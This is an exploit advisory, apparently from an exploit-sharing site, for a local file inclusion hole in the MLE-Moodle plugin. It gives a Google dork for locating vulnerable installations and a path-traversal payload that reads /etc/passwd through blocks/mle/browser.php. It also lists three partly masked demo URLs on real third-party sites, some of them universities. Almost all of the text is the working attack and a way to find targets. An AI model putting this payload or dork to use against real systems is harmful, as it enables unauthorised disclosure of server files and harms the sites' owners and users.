# Exploit Title: MLE-Moodle 0.8.8.4 <= Local File Inclusion Vulnerability # Date: 19/12/2012 # Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/337878286310383) # Version: 2.3.0 # Category:: Local File Disclosure Vulnerability # Google Dork: intext:Powered by MLE-Moodle inurl:/blocks/mle/browser.php # Tested on: Xp SP 2 # Ex :[MLE-Moodle 0.8.8.4]/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd # Demo: # 01 :http://vsmXXXbera.com/moodle//blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd # 02 :http://mooXXe.sun.ac.za/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd # 03 :http://tecnoeduXX.uap.edu.ar/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd # 1337day.com [2012-12-20]